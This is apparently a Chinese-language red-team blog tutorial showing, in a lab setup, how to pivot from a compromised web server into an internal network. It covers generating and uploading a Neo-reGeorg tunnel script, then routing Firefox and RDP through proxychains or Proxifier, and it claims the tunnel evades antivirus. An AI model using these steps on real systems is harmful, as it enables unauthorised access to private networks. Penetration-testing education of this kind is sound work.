Neo-reGeorg + proxychains/proxifier 内網穿透

 Neo-reGeorg + proxychains/proxifier 内網穿透


作者 : Noth

前言 : 

拿到 Webshell 後,只是一個入口點而已,對於紅隊的成員遠遠不夠 xD  當客戶要求必須要拿到內網中的某一台主機權限,必須要想辦法滲透到內網當中,這時候我們可以透過 Neo-reGeorg 等 webproxy 工具代理進內網 :D  它的優勢是做了加密處理,避免特徵檢測,生成的腳本也免殺 ! 目前測試國內殺軟都不查殺該腳本,廢話不多,直接實戰。 

示意圖 : 

實作環境 : 

攻擊者 :  (192.168.137.130,kali,外網)

受害者 :  (192.168.137.128,windows 2008,兩張網卡(內網/外網) )

受害者 :  (10.10.10.128,windows 2003,內網)

內文 : 

kali 生成 Neo_reGeorg 腳本 : 

python3 neoreg.py generate -k noth

會新生成 neoreg_servers 目錄,裡面存放我們的 Web tunnel 腳本 : 

將我們的 tunnel.aspx 上傳到受害者的 webserver 上面 (筆者上傳到根目錄) : 

http://192.168.137.128/tunnel.aspx

執行程式 : 

python3 neoreg.py -k noth -u http://192.168.137.128/tunnel.aspx


修改 proxychains.conf  (/etc/proxychains.conf),修改成 127.0.0.1/1080 port :

開啟 firefox : 

proxychains firefox

訪問 10.10.10.128 


RDP :

proxychains rdesktop 10.10.10.128


成功登入 :



以上是在 Linux 下面用 Proxychains,在 windows 下面就是用 Proxifier :

設置代理服務器 


設置代理規則 : 


RDP :


 成功連接 : 


以上就是在 Linux / Windows 利用 WebProxy 代理進內網的過程 xD  對紅隊滲透人員來說這一步是非常重要的 xD  但要如何進內網後,又要隱匿自己的行蹤,筆者還在琢磨琢磨 :D   我始終相信著一句話,任何的專業都不是一蹴可及的 ! 正所謂千里之行,始於足下這個道理一般 ~  

留言

熱門文章